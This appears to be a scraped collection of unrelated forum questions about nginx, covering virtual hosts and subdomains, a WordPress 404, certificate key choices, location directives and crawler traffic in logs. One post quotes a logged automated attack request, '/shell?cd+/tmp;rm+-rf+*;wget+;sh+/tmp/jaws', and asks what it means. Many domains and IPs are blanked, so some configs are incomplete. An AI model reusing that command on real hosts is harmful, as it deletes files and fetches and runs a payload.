Weird GET request on internet facing Nginx

I spun up an internet facing nginx server in AWS and the logs started showing weird get requests with a search engine’s spider as user agent. - - [19/Aug/2020:20:09:19 +0000] "GET /rexcategory?categoryCodes=SHPCAT33&t=1360657001168 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+" ""  2020/08/19 20:08:39 [error] 29#29: *14 open() "/usr/share/nginx/html/eyloyrewards/category" failed (2: No such file or directory), client:, server: localhost, request: "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1", host: "" - - [19/Aug/2020:20:08:39 +0000] "GET /eyloyrewards/category?categoryCode=SHPCAT118&t=1314948609334 HTTP/1.1" 404 153 "-" "Sogou web spider/4.0(+" "" 

The domain mentioned in the second line does not belong to me. What is the meaning of these logs? Is my server being used to attack the mentioned domain, "" ?

Nginx not able to serve subdomain on same server as domain

On my nginx server (ubuntu 18.04), I want to host and, where is one index.html file and is a proxy to my node js api, which is running on port 3001.

I have 2 files in /etc/nginx/sites-available folder called and and here are the contents from those files.

// server {         listen 80;         listen [::]:80;          root /var/www/;         index index.html          server_name;          location / {                 try_files $  uri $  uri/ =404;         } }  // upstream domain_apis {         server;         keepalive 64; }  server {     listen 80;     server_name;   location / {         proxy_set_header X-Forwarded-For $  proxy_add_x_forwarded_for;         proxy_set_header X-Real-IP $  remote_addr;         proxy_set_header Host $  http_host;          proxy_http_version 1.1;         proxy_set_header Upgrade $  http_upgrade;         proxy_set_header Connection "upgrade";          proxy_pass http://domain_apis/;         proxy_redirect off;         proxy_read_timeout 240s;     } } 

when I hit, things are working fine. But when I hit, it serves the page from root folder. I have replaced reverse proxy with simple server with another subdomain, but it always serves the root domain.

Any ideas on how to debug this and how to check if requests are hitting the correct block?

Nginx main domain overwriting subdomains

I have an Nginx server running a website, and I’d like to add a new host under a subdomain, to the main domain.

However as the title suggests, the subdomain’s host seems to get ignored, and replaced by the main domain regardless.

Am I correct in assuming that the following statements, each in their own server block: server_name; server_name;

Will always go to

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" - -  "GET / HTTP/1.1" 400 157 "-" "-" - -  "GET / HTTP/1.1" 400 157 "-" "-" 

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

Why can’t I connect to the wordpress install page with Nginx?

I’m a newbie of WordPress. My environment is Ubuntu 18 + Nginx + PHP 7.

Following the tutorial(, the wordpress directory was placed on /var/www/html/

Then I config the nginx, here is my nginx config:

server {     listen 80;     server_name;      server_name;      root /var/www/html/;     index index.php;       # log files     access_log /var/log/nginx/;     error_log /var/log/nginx/;      location = /favicon.ico {         log_not_found off;         access_log off;     }      location = /robots.txt {         allow all;         log_not_found off;         access_log off;     }      location / {         try_files $  uri $  uri/ /index.php?$  args;     }      location ~ \.php$   {         include snippets/fastcgi-php.conf;         fastcgi_pass unix:/run/php/php7.2-fpm.sock;     }      location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$   {         expires max;         log_not_found off;     }  } 

But, when I tried to connect to the Nginx responses 404, instead of returning the wordpress install page.

I don’t have any idea of checking the issue. Thanks for your suggestion.

Algorithm and key size to choose for SSL certificates (security and CPU wise) in 2020 (using nginx)

I posted this question already on SO, but as it is not really a programmin question I thought it might be a better place to ask here:

I want to setup a new SSL certificate store for generating SSL certs (server certs (nginx) and client certs (linux/windows devices))

I’m searching already for quite some time and I’m not sure I fully understand. especially as some articles are a few years old.

Many articles just talk about RSA end seem to recommend 2048 or 3072 though mentioning that 2048 is today probably still the best choice ( )

I found for example one Article ( ) but it seems to talk mostly about key encryption as @dave_thompson_085 pointed out on SO

stating in the section “Asymmetric (“Public Key”) Encryption”

Use, in order of preference:     X25519 (for which the key size never changes) then symmetric encryption.     ECDH with secp256r1 (for which the key size never changes) then symmetric encryption.     RSA with 2048-bit keys.  The security of a 256-bit elliptic curve cryptography key is about even with 3072-bit RSA.  Although many organizations are recommending migrating from 2048-bit RSA to 3072-bit RSA (or even 4096-bit RSA)  in the coming years, don't follow that recommendation. Instead migrate from RSA to elliptic curve cryptography, and then breathe easy while you keep an eye out for post-quantum cryptography recommendations. 

However they don’t mention the impact on server CPU usage compared to RSA 2048/3072/4048. I also didn’t find many other articles suggesting to switch to Elliptic curve algorithms.

Another article ) _ tries to promote ECC instead of RSA, but comments on the article state, that ECC is less safe than RSA if quantum computers kick in. And the article cites nowhere numbers for what performance improvement to expect when using ECC. mentions potentially legal issues and fear of being sued.

Though CPU usage is not a major issue Id still like to get some idea as I’d like to use the same CA and cert store also on devices like raspberries.

So what is today the best choice for certificate key algorithms and key sizes for server certs (old internet explorer not required but PCs, tablets, mobile phones being used today should be able to connect to the server

and what’s the best choice for client certs (will not be used on mobile devices)?

I kind of tend to RSA 2048, but I’m really not that sure I interpret all the articles correctly and don’t like to make choices based on feelings.

Location directive is not working correctly nginx

I am trying to open the location of my index.php file for example:

The root folder is:

Code (markup):

The the url a user will use to get to this root folder is:
Code (markup):

Every time I use this location declaration I get a 404 or forbidden message

location /server/client/ {           alias /path/to/my/root/folder;           try_files $  uri $  uri/ /index.php$  uri$  is_args$  args;        }
Code (markup):

I just cannot…

Location directive is not working correctly nginx

Add Failthrough server of a LAN IP to Nginx?

I’m trying to add my machine’s LAN IP as a ‘failthrough’ location to use in the event the main server has issues.

Lately, my main server name (i.e. has been having some issues due to LetsEncrypt certs issues, so any URL running on my server using that domain name fails as well. What I want is to have Nginx automatically pass it to the machine’s IP instead if it detects the domain name itself is down.

I’m using the Docker LinuxServer LetsEncrypt container, and I’ve tried just adding the IP to the server_name variable in the config, but after restarting the container, nothing appears to change when trying to navigate to (it still just gives the same error page instead of redirecting to the IP).

Here’s the current config with the issue:

server {      listen 443 ssl http2 default_server;      root /config/www;     index index.php index.html index.htm;      server_name myserver.*;      # enable subfolder method reverse proxy confs     include /config/nginx/proxy-confs/*.subfolder.conf;      # Tell search engines not to crawl/add this domain     add_header X-Robots-Tag "noindex, nofollow, nosnippet, noarchive";      # all ssl related config moved to ssl.conf     include /config/nginx/ssl.conf;      # enable for ldap auth     #include /config/nginx/ldap.conf;      client_max_body_size 0;      location ~ \.php$   {         fastcgi_split_path_info ^(.+\.php)(/.+)$  ;         fastcgi_pass;         fastcgi_index index.php;         fastcgi_param  SCRIPT_FILENAME  $  document_root$  fastcgi_script_name;         include /etc/nginx/fastcgi_params;     } } 

Note this line in particular; the IP as the second server is the intended failthrough IP:

server_name myserver.*;

Also note: if I just use directly in a browser, it navigates to the intended page fine, so this has to be something config-wise with Nginx that I’m trying to solve. It seems like a pretty simple issue, but I’m not super familiar with Nginx config nuances yet.